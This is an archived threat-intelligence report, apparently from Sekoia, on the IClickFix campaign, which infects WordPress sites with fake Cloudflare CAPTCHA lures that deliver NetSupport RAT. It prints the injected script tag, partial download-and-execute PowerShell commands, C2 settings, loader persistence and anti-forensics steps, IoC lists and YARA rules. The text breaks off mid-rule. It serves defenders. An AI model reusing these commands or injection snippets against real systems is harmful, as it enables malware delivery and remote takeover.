{ "id": "18c25e94-d4e4-4c0a-b315-8e1417053eb9", "created_at": "2026-04-06T00:13:48.823665Z", "updated_at": "2026-04-10T13:13:06.225647Z", "deleted_at": null, "sha1_hash": "29e31357ae811beabbe597ff82092503a5a73c3e", "title": "Meet IClickFix: a widespread WordPress-targeting framework using the ClickFix tactic", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 2667145, "plain_text": "Meet IClickFix: a widespread WordPress-targeting framework using the\r\nClickFix tactic\r\nBy Quentin Bourgue,\u0026nbsp;Amaury G.\u0026nbsp;and\u0026nbsp;Sekoia TDR\r\nPublished: 2026-01-29 · Archived: 2026-04-05 18:31:21 UTC\r\nThis post was originally distributed as a private FLINT report to our customers on 6 January 2026.\r\nTable of contents\r\nIntroduction\r\nThreat hunting of emerging adversary clusters\r\nTracking ClickFix clusters in the wild\r\nFrom compromised WordPress to infected system\r\nIClickFix delivery stages\r\nNetSupport RAT infection\r\nIClickFix’s spread in the wild\r\nCompromised WordPress worldwide\r\nHistorical data\r\nConclusion\r\nIoCs \u0026 Technical details\r\nIoCs\r\nYARA rules\r\nExternal references\r\nIntroduction\r\nIn November 2025, during our threat hunting routine for unveiling emerging adversary clusters, TDR analysts identified a\r\nwidespread malware distribution campaign leveraging the ClickFix social engineering tactic through a Traffic\r\nDistribution System (TDS).\r\nThis cluster uses a malicious JavaScript framework injected into compromised WordPress sites to display the ClickFix lure\r\nand deliver NetSupport RAT. Because the initial JavaScript includes the distinctive HTML tag ic-tracker-js , we named\r\nthe malicious framework “IClickFix”.\r\nHistorical analysis of IClickFix reveals that this cluster has been active since at least December 2024, compromising over\r\n3,800 WordPress sites. As reported by the Walmart Global Tech security team1, this cluster uses a Traffic Distribution\r\nSystem (TDS) to redirect selected visitors and deliver the next-stage payload, enhancing IClickFix’s stealth.\r\nTDR analysts first encountered this ClickFix cluster in February 2025, when it was in its early stages. We observed it\r\ndistributing Emmenhtal Loader, which ultimately downloaded XFiles Stealer. At that time, IClickFix had not yet reached\r\nsufficient scale to warrant an in-depth analysis.\r\nLike the ClearFake threat2, IClickFix employs a multi-stage JavaScript loader that presents a fake Cloudflare Turnstile\r\nCAPTCHA challenge using the ClickFix social engineering tactic. The ClickFix command, once copied into the victim’s\r\nclipboard, executes a PowerShell command that downloads and executes an obfuscated PowerShell script, ultimately\r\nhttps://blog.sekoia.io/meet-iclickfix-a-widespread-wordpress-targeting-framework-using-the-clickfix-tactic/\r\nPage 1 of 19\n\ndropping NetSupport RAT.\r\nThis report provides a technical analysis of the persistent IClickFix framework, the adversary’s infrastructure, and its\r\ntechnical evolution throughout 2025.\r\nThreat hunting of emerging adversary clusters\r\nIn November 2025, we unveiled the IClickFix framework and its associated infrastructure using two distinct threat hunting\r\nmethodologies:\r\nAn internal tool designed to detect watering hole attacks across thousands of monitored websites belonging to\r\nstrategic organisations in government, defense, energy, telecom, and other verticals.\r\nGeneric YARA rules deployed on scanning platforms to detect pages employing the ClickFix social engineering\r\ntactic.\r\nExposing watering hole attacks\r\nIn late 2025, Sekoia TDR analysts deployed a new capability for detecting watering hole attacks.\r\nA watering hole attack is a strategic attack where operators compromise a legitimate website known to be frequented by a\r\nspecific target group, effectively ambushing users who visit the trusted source. This tactic is often leveraged by state-sponsored actors to conduct espionage against specific sectors (like defense or finance) by targeting a distinct community\r\nof interest, but also serves as a potent vector for broader cybercrime operations.\r\nWhen our monitoring began in November, the Ghanaian Allied Health Professions Council government WordPress website\r\nahpc.gov[.]gh was flagged after the main page includes a malicious JavaScript snippet that interacts with the URL\r\nhxxps://ototaikfffkf[.]com/fffa.js , registered a few months earlier.\r\nhttps://blog.sekoia.io/meet-iclickfix-a-widespread-wordpress-targeting-framework-using-the-clickfix-tactic/\r\nPage 2 of 19\n\nFigure 1. Screenshot of the Ghanaian Allied Health Professions Council compromised website\r\nAlthough the initial indicators suggested a targeted watering‑hole, we quickly observed the same JavaScript snippet across\r\nmultiple unrelated websites spanning different sectors and countries. This pattern indicates a mass distribution rather than a\r\ntargeted approach against the government in Ghana.\r\nTracking ClickFix clusters in the wild\r\nSekoia TDR analysts actively track pages that implement the ClickFix social engineering tactic, given its widespread\r\nadoption by cybercriminals and nation-state-sponsored threat groups. In particular, we have developed generic YARA rules\r\ndetecting ClickFix pages, using keywords, resource patterns, and JavaScript functions.\r\nBy November 2025, while analysing detection results from the urlquery scanning service3, one of these rules triggered alerts\r\nfor resources retrieved from multiple scanned URLs. The detected resources consisted of HTML pages, served by the\r\nmalicious framework and containing ClickFix-related strings, including:\r\nVerify you are human\r\nplease follow these steps\r\n\u003cb\u003eCtrl + V\u003c/b\u003e\r\nhttps://blog.sekoia.io/meet-iclickfix-a-widespread-wordpress-targeting-framework-using-the-clickfix-tactic/\r\nPage 3 of 19\n\n\u003cb\u003eWin + R\u003c/b\u003e\r\nPress \u003cb\u003eEnter\u003c/b\u003e\r\nnavigator.clipboard.writeText(\r\nAs shown in the following figure, the website scanned on urlquery contacted several domains and fetched resources\r\nmatching our phishing_clickfix_generic_9 YARA rule.\r\nFigure 2. ClickFix alerts generated for a website compromised by IClickFix, from the urlquery scanning\r\nservice\r\nAfter our threat hunting tools and the Sekoia SOC platform’s telemetry flagged multiple malicious domains, and following\r\nour initial February 2025 observation confirming a persistent and widespread threat, we conducted an in-depth analysis of\r\nthe ClickFix cluster.\r\nFrom compromised WordPress to infected system\r\nAs of 9 December 2025, here is an overview of the infection chains’ stages observed4:\r\nhttps://blog.sekoia.io/meet-iclickfix-a-widespread-wordpress-targeting-framework-using-the-clickfix-tactic/\r\nPage 4 of 19\n\nFigure 3. Overview of the IClickFix framework infection chain\nThe actions performed from the user’s perspective are:\nUpon accessing the compromised website, the legitimate HTML content initially loads as expected.\nHowever, within seconds, the entire page is replaced by a fake CAPTCHA challenge designed to mimic Cloudflare\nTurnstile.\nWhen the user attempts to resolve the challenge, he is instructed to copy and execute a specific command to complete\nthe verification.\nThis command conceals malicious code that differs from the displayed instructions, ultimately resulting in the\nexecution and deployment of the NetSupport RAT.\nIClickFix delivery stages\nWordPress sites compromised by the IClickFix framework\nThe IClickFix operator compromised WordPress sites, acting as watering hole, to inject the following malicious JavaScript\ncode into their HTML pages:\n...\nhttps://blog.sekoia.io/meet-iclickfix-a-widespread-wordpress-targeting-framework-using-the-clickfix-tactic/\nPage 5 of 19\n\n...\r\n\u003cscript type=\"text/javascript\" src=\"hxxps://ksfldfklskdmbxcvb[.]com/gigi?ts=1765169670\" id=\"ic-tracker-js\" defer=\"defer\" d\r\n...\r\nCode 1 – IClickFix JavaScript injected into compromised WordPress sites\r\nThis initial JavaScript snippet injected into legitimate serves two purposes:\r\nPrefetch the attacker’s domain ksfldfklskdmbxcvb[.]com before requesting the resource, using the HTML attribute\r\ndns-prefetch.\r\nLoad an external JavaScript from the attacker’s domain.\r\nThe external URL redirects, via the Location HTTP header, to a second URL hosting the next-stage JavaScript script:\r\nhxxps://ksdkgsdkgkgmgm[.]pro/ofofo.js . Unwanted traffic is instead redirected via an HTTP 301 to\r\nhxxps://ksfldfklskdmbxcvb[.]com/- , which fails to load. Notably, HTTP responses include the header x-robots-tag:\r\nnoindex .\r\nWe assess with high confidence that the attacker abuses the open-source URL shortener YOURLS5 as a Traffic Distribution\r\nSystem (TDS). Indeed, the domain hosts a YOURLS administration panel at /admin/\r\n6\r\n, and the redirection behavior\r\n(HTTP 301, redirect to /- , x-robots-tag header) matches YOURLS’s PHP redirect function7.\r\nThese redirection steps enable the attacker to filter visitors by device characteristics and protect their infrastructure from\r\nbots, scanners, and other unwanted traffic. To our knowledge, this is the first time that Sekoia analysts have observed\r\nYOURLS being abused as a TDS by cybercriminals.\r\nJavaScript payloads\r\nThe first payload, fetched from hxxps://ksdkgsdkgkgmgm[.]pro/ofofo.js , is an obfuscated JavaScript file that:\r\nExfiltrates the fingerprint data, the compromised site’s domain and the timestamp, to a base64-encoded URL using\r\nthe pattern:\r\n.php?data={\"host\": \u003cCOMPROMISED_WORDPRESS\u003e,\"now\": \u003cUNIX_TIMESTAMP\u003e}\r\nLoads a second JavaScript from: hxxps://booksbypatriciaschultz[.]com/liner.php .\r\nhttps://blog.sekoia.io/meet-iclickfix-a-widespread-wordpress-targeting-framework-using-the-clickfix-tactic/\r\nPage 6 of 19\n\nFigure 4. First JavaScript fetched by WordPress sites compromised by IClickFix framework\r\nThe second payload, loaded from hxxps://booksbypatriciaschultz[.]com/liner.php , is a JavaScript that:\r\nLoads an HTML page, containing the ClickFix lure and the JavaScript for fake CAPTCHA interactions.\r\nFetches the compromised WordPress site’s favicon.\r\nListens for the event sync_event_click in the loaded HTML and exfiltrates fingerprint data to the same server using\r\nthe pattern:\r\n.php?click=1\u0026data={\"host\": \u003cCOMPROMISED_DOMAIN\u003e,\"now\": \u003cUNIX_TIMESTAMP\u003e}\r\nOf note, the attacker uses another compromised WordPress ( booksbypatriciaschultz[.]com ) to host the PHP code of this\r\nIClickFix framework’s part.\r\nClickFix lure\r\nAfter the JavaScript loads the ClickFix lure, it replaces the original WordPress page with the following webpage.\r\nIf the user clicks the CAPTCHA button, an alert appears stating “Unusual Web Traffic Detected”, followed by instructions to\r\nverify that the activity originates from a legitimate user. The ClickFix command is also copied to the user’s clipboard.\r\nhttps://blog.sekoia.io/meet-iclickfix-a-widespread-wordpress-targeting-framework-using-the-clickfix-tactic/\r\nPage 7 of 19\n\nFigure 5. ClickFix lure impersonating Cloudflare Turnstile used by the IClickFix framework\r\nThis widespread social engineering tactic, known as ClickFix, is designed to convince users to run a malicious command in\r\ntheir Windows console, thereby compromising their system.\r\nInterestingly, this ClickFix lure, which impersonates the Cloudflare CAPTCHA and fakes “unusual traffic”, closely\r\nresembles the lure deployed by the ClearFake framework in early 2025, as detailed in our March 2025 report. The page’s\r\nsource code (CSS, JavaScript, HTML) is nearly identical to ClearFake’s one. It appears the operator borrowed the ClearFake\r\nlure while developing the IClickFix framework. Because IClickFix is less sophisticated than ClearFake, we assess with high\r\nconfidence that two different cybercriminals developed and operated these malware distribution frameworks.\r\nNetSupport RAT infection\r\nAs of early December 2025, the ClickFix command distributed by the IClickFix cluster was:\r\npowershell -w hidden -nop -c \"$v='8db6.ps1';$q=Join-Path $env:ProgramData 'e';$p=Join-Path $q $v;md $q -ea 0|out-null;iwr\r\nThis command downloads a PowerShell script, disguised as a JSON file, and executes it by bypassing the execution policy.\r\nThe script (SHA256: 05b03a25e10535c5c8e2327ee800ff5894f5dbfaf72e3fdcd9901def6f072c6d ) is a large PowerShell script\r\nembedding multiple files, all obfuscated via base64 encoding and string slicing. The PowerShell loader’s main operations\r\naim to:\r\nCreate a marker file in TEMP to prevent re-running for 72 hours, then self-delete the script.\r\nCreate the directory ProgramData\\S1kCMNfZi3\\ and write 15 files into it by joining and base64-decoding the\r\nobfuscated strings.\r\nEstablish persistence via the Windows Run registry key, pointing to the executable client32.exe .\r\nLaunch client32.exe using explorer.exe.\r\nhttps://blog.sekoia.io/meet-iclickfix-a-widespread-wordpress-targeting-framework-using-the-clickfix-tactic/\r\nPage 8 of 19\n\nClear the RunMRU (most recently used) command history to remove traces of the ClickFix command, then self-remove.\r\nOf note, this PowerShell script is masquerading as a legitimate installer for “SecureModule Engine v1.0.0” , with\r\ninstallation messages and a progress bar.\r\nThis PowerShell loader serves as a dropper for NetSupport RAT offering persistence, obfuscation, and indicator removal\r\ncapabilities. The 15 written files are components of the NetSupport RAT deployment:\r\nFilename Role SHA256\r\nAudioCapture.dll\r\nNetSupport\r\naudio\r\ncapturing\r\nlibrary\r\n2cc8ebea55c06981625397b04575ed0eaad9bb9f9dc896355c011a62febe49b5\r\nclient32.exe\r\nNetSupport\r\nclient\r\nexecutable\r\n06a0a243811e9c4738a9d413597659ca8d07b00f640b74adc9cb351c179b3268\r\nclient32.ini\r\nNetSupport\r\nclient\r\nconfiguration\r\nfile\r\n62f7a444ab0c645f20c7dc6340c3eaaad7ef033b2188c3e5123406762990c517\r\ngggg.txt Unknown 6846bc236bd2095fbf93f8b31dd4ca0798614fcab20fbd2ecac6cc7f431c6dec\r\nHTCTL32.DLL\r\nNetSupport\r\nHTTP\r\ncommunication\r\nlibrary\r\n6562585009f15155eea9a489e474cebc4dd2a01a26d846fdd1b93fdc24b0c269\r\nmsvcr100.dll\r\nMicrosoft C++\r\nruntime library\r\n8793353461826fbd48f25ea8b835be204b758ce7510db2af631b28850355bd18\r\nnskbfltr.inf\r\nNetSupport\r\nkeyboard filter\r\nd96856cd944a9f1587907cacef974c0248b7f4210f1689c1e6bcac5fed289368\r\nNSM.ini\r\nNetSupport\r\nconfiguration\r\nfile\r\ne0ed36c897eaa5352fab181c20020b60df4c58986193d6aaf5bf3e3ecdc4c05d\r\nNSM.LIC\r\nNetSupport\r\nlicence file\r\n83a6feb6304effcd258129e5d46f484e4c34c1cce1ea0c32a94a89283ccd24f9\r\nnsm_vpro.ini\r\nNetSupport\r\nvPro\r\nconfiguration\r\nfile\r\n4bfa4c00414660ba44bddde5216a7f28aeccaa9e2d42df4bbff66db57c60522b\r\npcicapi.dll NetSupport\r\ncommunication\r\n2dfdc169dfc27462adc98dde39306de8d0526dcf4577a1a486c2eef447300689\r\nhttps://blog.sekoia.io/meet-iclickfix-a-widespread-wordpress-targeting-framework-using-the-clickfix-tactic/\r\nPage 9 of 19\n\nlibrary\r\nPCICHEK.DLL\r\nNetSupport\r\nsystem check\r\nlibrary\r\n0cff893b1e7716d09fb74b7a0313b78a09f3f48c586d31fc5f830bd72ce8331f\r\nPCICL32.DLL\r\nNetSupport\r\ncore\r\ndependency\r\nlibrary\r\nb6d4ad0231941e0637485ac5833e0fdc75db35289b54e70f3858b70d36d04c80\r\nremcmdstub.exe\r\nNetSupport\r\nremote\r\ncommand\r\nprompt stub\r\nb11380f81b0a704e8c7e84e8a37885f5879d12fbece311813a41992b3e9787f2\r\nNetSupport C2 domains are configured in client32.ini as follows:\r\nGatewayAddress=pusykakimao[.]com:443\r\nPort=443\r\nSecondaryGateway=fnotusykakimao[.]com:443\r\nSecondaryPort=443\r\nThe malware communicates with its C2 servers on the endpoint /fakeurl.htm.\r\nThe license file lists KAKAN as the licensee and serial number NSM789508, identifiers previously seen in other ClickFix\r\ncampaigns, such as EVALUSION, documented by eSentire8.\r\nNetSupport RAT is a legitimate, commercially available remote administration tool frequently abused by cybercriminals. It\r\ngrants attackers full control of the infected host, including screen and audio monitoring, keystroke logging, command\r\nexecution, persistence, and file transfers.\r\nIClickFix’s spread in the wild\r\nCompromised WordPress worldwide\r\nBy pivoting on specific code patterns observed within the redirection chain and leveraging server indexing services, we\r\nidentified a cluster of over 3,800 compromised WordPress involved in this campaign. We performed a demographic analysis\r\nof these compromised WordPress sites, categorising them by geography (based on TLD and domain linguistics) and industry\r\nvertical.\r\nhttps://blog.sekoia.io/meet-iclickfix-a-widespread-wordpress-targeting-framework-using-the-clickfix-tactic/\r\nPage 10 of 19\n\nFigure 6. Statistics on geographical and industry distribution of WordPress sites compromised by the\r\nIClickFix framework\r\nOur analysis reveals a global footprint spanning 82 distinct countries. While the United States accounts for the plurality of\r\ninfections, the wide geographic dispersion suggests a lack of targeted regional efforts. Similarly, the distribution across\r\nindustry verticals does not reflect a concerted effort to target specific sectors. Consequently, we assess that this campaign\r\nrelies on opportunistic mass exploitation rather than strategic targeting.\r\nhttps://blog.sekoia.io/meet-iclickfix-a-widespread-wordpress-targeting-framework-using-the-clickfix-tactic/\r\nPage 11 of 19\n\nThe compromised websites likely resulted from the exploitation of a vulnerability within the WordPress core or a widely\r\ndeployed third-party plugin, or the use of administrative credentials harvested via infostealers or phishing campaigns.\r\nFingerprinting conducted on 18 December 2025 revealed that the majority of infected sites are running current or near-current WordPress configurations, specifically versions 6.9 (released on 2 December 2025) and 6.8.3 (released on 30\r\nSeptember 2025). A correlation was observed with the presence of up-to-date versions of the Elementor9, WooCommerce10,\r\nand Gravity Forms11 plugins. At the time of writing, the initial access vector has not been identified.\r\nHistorical data\r\nIn February 2025, while investigating Emmenhtal Loader, TDR analysts discovered an early version of what we later\r\nnamed, the IClickFix cluster, which was already distributed using compromised WordPress and a Cloudflare Turnstile lure.\r\nThe ClickFix command copied in user’s clipboard data downloaded a MSI file, a sample of Emmenhtal Loader, that\r\nultimately downloaded and executed XFiles Stealer.\r\nAt that stage, the IClickFix cluster remained in its first months of development, having compromised just 160 WordPress\r\nsites according to PublicWWW results for the distinctive HTML tag ic-tracker-js , which was already in use at that time.\r\nAs illustrated below, the page impersonating Cloudflare Turnstile displayed step-by-step keyboard instructions to explain\r\nhow to execute the malicious command. We assess that this initial lure was less convincing than a fake Cloudflare Turnstile\r\nchallenge, which users are accustomed to completing.\r\nFigure 7. ClickFix lure used in February 2025 on websites compromised by IClickFix\r\nIn early February 2025, the malicious code injected into compromised WordPress sites fetched JavaScript from\r\nhxxp://qq525f.short[.]gy/claud (URL from the Short[.]gy URL shortener), which then redirected to\r\nhxxps://bestieslos[.]com/over.js . At this stage, there was no TDS protection and only a single execution step: the\r\ndownloaded JavaScript contained the HTML lure, the ClickFix command, and JavaScript to perform clipboard operations.\r\nAs of early February 2025, the ClickFix command distributed by IClickFix cluster was:\r\ncmd /c start /min powershell -NoProfile -WindowStyle Hidden -Command $path='c:\\\\\\\\users\\\\\\\\public\\\\\\\\3aw.msi'; Invoke-Res\r\nThroughout 2025, IClickFix technical evolutions demonstrated that the operator has consistently updated the framework\r\ncode, lures, and payloads, and compromised additional WordPress sites to expand the cluster’s reach.\r\nhttps://blog.sekoia.io/meet-iclickfix-a-widespread-wordpress-targeting-framework-using-the-clickfix-tactic/\r\nPage 12 of 19\n\nConclusion\r\nThe IClickFix framework serves as a widespread and persistent initial access vector, leveraging the ClickFix social\r\nengineering tactic for malware distribution. Since emerging in late 2024, this cluster has compromised over 3,800\r\nWordPress sites through opportunistic watering hole attacks to distribute commodity malware, such as NetSupport\r\nRAT, Emmenhtal Loader and XFiles Stealer.\r\nThroughout 2025, the IClickFix operator consistently updated the malicious framework by abusing the YOURLS URL\r\nshortener as a Traffic Distribution System (TDS), introducing additional JavaScript delivery stages, refining the lure, and\r\ncompromising more WordPress sites. These updates have strengthened, protected and expanded the IClickFix\r\ninfrastructure, thereby complicating both analysis and detection.\r\nBy leveraging the ClickFix social engineering technique and massively exploiting vulnerable WordPress sites, the operator\r\nhas affected numerous users worldwide. TDR assess with moderate confidence that the IClickFix framework may be\r\nresponsible for thousands of infections per day.\r\nTo protect our customers from IClickFix, Sekoia.io analysts will continue proactive monitoring of this threat and other\r\nclusters leveraging the ClickFix social engineering tactic.\r\nIoCs \u0026 Technical details\r\nThe indicators listed below and YARA rules are available in CSV format with additional metadata in the SEKOIA-IO/Community GitHub repository.\r\nIoCs\r\nIClickFix framework\r\nStage 1: redirection domains\r\nDomain name Creation date\r\ndasktiitititit[.]com\r\nksfldfklskdmbxcvb[.]com\r\nappasdmdamsdmasd[.]com\r\naasdtvcvchcvhhhhh[.]com\r\ndhdjisksnsbhssu[.]com\r\nksaitkktkatfl[.]com\r\nasdaotasktjastmnt[.]com\r\nskldfjgsldkmfgsdfg[.]com\r\njdaklsjdklajsldkjd[.]com\r\nfsdotiototakkaakkal[.]com\r\nikfsdfksldkflsktoq[.]com\r\nititoiaitoaitoiakkaka[.]com\r\ndasopdoaodoaoaoao[.]com\r\nsdfikguoriqoir.cloud\r\nototoqtklktzlk[.]com\r\npptpooalfkakktl[.]com\r\nforfsakencoilddxga[.]com\r\n2025-11-22\r\n2025-11-22\r\n2025-11-04\r\n2025-11-02\r\n2025-10-22\r\n2025-10-12\r\n2025-09-30\r\n2025-09-16\r\n2025-07-01\r\n2025-06-06\r\n2025-05-12\r\n2025-05-03\r\n2025-04-28\r\n2025-04-20\r\n2025-04-08\r\n2025-03-28\r\n2025-03-18\r\nhttps://blog.sekoia.io/meet-iclickfix-a-widespread-wordpress-targeting-framework-using-the-clickfix-tactic/\r\nPage 13 of 19\n\novertimeforus[.]com\r\ntripallmaljok[.]com\r\npqoqllalll[.]com\r\nqit15.short[.]gy\r\nqq51f.short[.]gy\r\nqq525f.short[.]gy\r\n2025-03-14\r\n2025-03-05\r\n2025-03-01\r\n2025-03-01\r\n2025-02-01\r\n2025-01-09\r\nStage 2: domains hosting JavaScript payload 1\r\nDomain name Creation date\r\nksdkgsdkgkgmgm[.]pro\r\nfsdtiototoitweot[.]com\r\nalsokdalsdkals[.]com\r\nldasldalsd[.]com\r\nfoflfalflafl[.]com\r\nototaikfffkf[.]com\r\nxxclglglglklgkxlc[.]com\r\nzmzkdodudhdbdu[.]com\r\naksdaitkatktk[.]com\r\ndasdalksdkmasdas[.]com\r\nkdkdaosdkalkdkdakd[.]com\r\ncaprofklfkzttripwith[.]com\r\nkdfmmikfkafjikmfikfjhm[.]com\r\nserviceverifcaptcho[.]com\r\nkalkgmbzfghq[.]com\r\nundermymindops[.]com\r\nbestiamos[.]com\r\nbestieslos[.]com\r\n2025-12-05\r\n2025-12-05\r\n2025-11-22\r\n2025-11-14\r\n2025-11-14\r\n2025-11-04\r\n2025-11-02\r\n2025-10-22\r\n2025-10-12\r\n2025-10-05\r\n2025-06-20\r\n2025-03-18\r\n2025-03-18\r\n2025-03-12\r\n2025-03-07\r\n2025-02-27\r\n2025-02-16\r\n2024-12-18\r\nStage 3: compromised domains hosting JavaScript payload 2\r\nDomain name Creation date\r\n1teamintl[.]com\r\nmexicaletta[.]com[.]br\r\nbooksbypatriciaschultz[.]com\r\nwww.webentangled[.]com\r\nalmhdnursing[.]qa\r\nwww.alwanqa[.]com\r\ntalentforth[.]org\r\nwintars[.]com\r\nerisaactuarialservices[.]com\r\nmedi-care[.]gr\r\nwww.raftingsella[.]com\r\njairecanoas[.]com\r\nabogados-gs[.]com\r\n2025-12-16\r\n2025-12-07\r\n2025-11-24\r\n2025-11-24\r\n2025-11-20\r\n2025-11-17\r\n2025-11-12\r\n2025-11-11\r\n2025-11-06\r\n2025-11-05\r\n2025-10-30\r\n2025-10-22\r\n2025-10-15\r\nhttps://blog.sekoia.io/meet-iclickfix-a-widespread-wordpress-targeting-framework-using-the-clickfix-tactic/\r\nPage 14 of 19\n\nwww.mitaxi[.]net\r\nstangherlini[.]com[.]br\r\necoawnings[.]com[.]au\r\ndreamdraftingsydney[.]com[.]au\r\nsolpower[.]com[.]my\r\nsfc-oman[.]com\r\ngerab[.]bt\r\nsoinpharmaceuticals[.]com\r\n2025-10-13\r\n2025-10-05\r\n2025-10-03\r\n2025-09-29\r\n2025-09-21\r\n2025-09-16\r\n2025-09-11\r\n2025-09-07\r\nNetSupport RAT\r\nRecent NetSupport RAT C2 domains used by the IClickFix campaign\r\nDomain name Creation date\r\nnightlomsknies[.]com\r\nnotlimbobimboa[.]com\r\nnotmauserfizko[.]com\r\nfnotusykakimao[.]com\r\notpnemoyjfh[.]com\r\npisikakimmmad[.]com\r\nmakimakiokina[.]com\r\nsmallfootmyfor[.]com\r\nunderstandott[.]com\r\nadventurergsdfjg[.]com\r\nremarkableaskf[.]com\r\nfoundationasdasd[.]com\r\ngenerationkasdm[.]com\r\nuniversitynsd[.]com\r\nbasketballast[.]com\r\nblueprintsfdskjhfd[.]com\r\nvoluntarydasd[.]com\r\natmospheredast[.]com\r\nnewgenlosehops[.]com\r\nlastmychancetoss[.]com\r\nlosiposithankyou[.]com\r\n2025-12-01\r\n2025-11-13\r\n2025-11-13\r\n2025-11-13\r\n2025-11-02\r\n2025-11-02\r\n2025-11-02\r\n2025-10-03\r\n2025-09-26\r\n2025-09-26\r\n2025-09-26\r\n2025-09-26\r\n2025-09-26\r\n2025-09-26\r\n2025-09-26\r\n2025-09-26\r\n2025-09-26\r\n2025-09-26\r\n2025-08-05\r\n2025-08-05\r\n2025-07-01\r\nNetSupport RAT C2 IP address and URL used by the IClickFix campaign\r\nDomain name First seen Last seen\r\n85.208.84[.]35\r\nhttp://85.208.84[.]35:443/fakeurl.htm\r\n141.98.11[.]175\r\nhttp://141.98.11[.]175/fakeurl.htm\r\n83.222.190[.]174\r\nhttp://83.222.190[.]174:443/fakeurl.html\r\n2025-10-09\r\n2025-10-09\r\n2025-08-16\r\n2025-08-16\r\n2025-05-10\r\n2025-05-10\r\n–\r\n–\r\n2025-09-10\r\n2025-09-10\r\n2025-07-04\r\n2025-07-04\r\nhttps://blog.sekoia.io/meet-iclickfix-a-widespread-wordpress-targeting-framework-using-the-clickfix-tactic/\r\nPage 15 of 19\n\nNetSupport RAT files used by the IClickFix campaign\r\nFilename Role SHA256\r\nAudioCapture.dll\r\nNetSupport\r\naudio\r\ncapturing\r\nlibrary\r\n2cc8ebea55c06981625397b04575ed0eaad9bb9f9dc896355c011a62febe49b5\r\nclient32.exe\r\nNetSupport\r\nclient\r\nexecutable\r\n06a0a243811e9c4738a9d413597659ca8d07b00f640b74adc9cb351c179b3268\r\nclient32.ini\r\nNetSupport\r\nclient\r\nconfiguration\r\nfile\r\n62f7a444ab0c645f20c7dc6340c3eaaad7ef033b2188c3e5123406762990c517\r\ngggg.txt Unknown 6846bc236bd2095fbf93f8b31dd4ca0798614fcab20fbd2ecac6cc7f431c6dec\r\nHTCTL32.DLL\r\nNetSupport\r\nHTTP\r\ncommunication\r\nlibrary\r\n6562585009f15155eea9a489e474cebc4dd2a01a26d846fdd1b93fdc24b0c269\r\nmsvcr100.dll\r\nMicrosoft C++\r\nruntime library\r\n8793353461826fbd48f25ea8b835be204b758ce7510db2af631b28850355bd18\r\nnskbfltr.inf\r\nNetSupport\r\nkeyboard filter\r\nd96856cd944a9f1587907cacef974c0248b7f4210f1689c1e6bcac5fed289368\r\nNSM.ini\r\nNetSupport\r\nconfiguration\r\nfile\r\ne0ed36c897eaa5352fab181c20020b60df4c58986193d6aaf5bf3e3ecdc4c05d\r\nNSM.LIC\r\nNetSupport\r\nlicence file\r\n83a6feb6304effcd258129e5d46f484e4c34c1cce1ea0c32a94a89283ccd24f9\r\nnsm_vpro.ini\r\nNetSupport\r\nvPro\r\nconfiguration\r\nfile\r\n4bfa4c00414660ba44bddde5216a7f28aeccaa9e2d42df4bbff66db57c60522b\r\npcicapi.dll\r\nNetSupport\r\ncommunication\r\nlibrary\r\n2dfdc169dfc27462adc98dde39306de8d0526dcf4577a1a486c2eef447300689\r\nPCICHEK.DLL\r\nNetSupport\r\nsystem check\r\nlibrary\r\n0cff893b1e7716d09fb74b7a0313b78a09f3f48c586d31fc5f830bd72ce8331f\r\nhttps://blog.sekoia.io/meet-iclickfix-a-widespread-wordpress-targeting-framework-using-the-clickfix-tactic/\r\nPage 16 of 19\n\nPCICL32.DLL\r\nNetSupport\r\ncore\r\ndependency\r\nlibrary\r\nb6d4ad0231941e0637485ac5833e0fdc75db35289b54e70f3858b70d36d04c80\r\nremcmdstub.exe\r\nNetSupport\r\nremote\r\ncommand\r\nprompt stub\r\nb11380f81b0a704e8c7e84e8a37885f5879d12fbece311813a41992b3e9787f2\r\nYARA rules\r\nCompromised legitimate WordPress websites injected by the IClickFix framework:\r\nrule infrastructure_iclickfix_cluster_ic_tracker_js_wordpress {\r\n meta:\r\n description = \"Find WordPress HTML compromised by the IClickFix cluster, that injects the ic-tracker-js HTML tag\"\r\n source = \"Sekoia.io\"\r\n creation_date = \"2025-12-04\"\r\n modification_date = \"2025-12-04\"\r\n classification = \"TLP:CLEAR\"\r\n strings:\r\n $wp01 = \"\\\" id=\\\"ic-tracker-js\\\"\" ascii\r\n condition:\r\n all of them\r\n}\r\nFirst obfuscated JavaScript of the IClickFix framework:\r\nrule infrastructure_iclickfix_cluster_ic_tracker_js_javascript1 {\r\n meta:\r\n description = \"Find the first obfuscated JavaScript of the IClickFix cluster, that contacts the .php?data= URL to\r\n source = \"Sekoia.io\"\r\n creation_date = \"2025-12-04\"\r\n modification_date = \"2025-12-04\"\r\n classification = \"TLP:CLEAR\"\r\n strings:\r\n $obfjs01 = \"'location'\" ascii\r\n $obfjs02 = \"'style'\" ascii\r\n $obfjs03 = \"?data=\" ascii\r\n $obfjs04 = \"={'host'\" ascii\r\n $obfjs05 = \"animation:1s\\\\x20ease-in-out\\\\x201s\\\\x20forwards\\\\x20fadeIn}',\" ascii\r\n $obfjs06 = \"}(document,\" ascii\r\n $obfjs07 = \"'aHR0cH\" ascii\r\n $obfjs08 = \"'now'\" ascii\r\nhttps://blog.sekoia.io/meet-iclickfix-a-widespread-wordpress-targeting-framework-using-the-clickfix-tactic/\r\nPage 17 of 19\n\ncondition:\r\n 6 of ($obfjs0*)\r\n}\r\nSecond obfuscated JavaScript of the IClickFix framework:\r\nrule infrastructure_iclickfix_cluster_ic_tracker_js_javascript2 {\r\n meta:\r\n description = \"Find the second JavaScript of the IClickFix cluster, that contacts the .php?page= URL to download t\r\n source = \"Sekoia.io\"\r\n creation_date = \"2025-12-04\"\r\n modification_date = \"2025-12-04\"\r\n classification = \"TLP:CLEAR\"\r\n strings:\r\n $datajs01 = \"xhr.send();\" ascii\r\n $datajs02 = \".php?page=\\\");\" ascii\r\n $datajs03 = \"function getFaviconPath() {\" ascii\r\n $datajs04 = \"close-tlc-data\" ascii\r\n $datajs05 = \".php?click=1\u0026data=\\\"\" ascii\r\n $datajs06 = \"// listen from child\" ascii\r\n $datajs07 = \"--loadNumValue\" ascii\r\n $datajs08 = \"encodeURIComponent(JSON.stringify(data))\" ascii\r\n $datajs09 = \"/* WHITE background: rgba(255,255,255,0.65); */\" ascii\r\n condition:\r\n 6 of ($datajs0*)\r\n}\r\nHTML of the IClickFix lure impersonating the Cloudflare Turnstile CAPTCHA:\r\nrule infrastructure_iclickfix_cluster_ic_tracker_html_lure {\r\n meta:\r\n description = \"Find the HTML lure used by the IClickFix 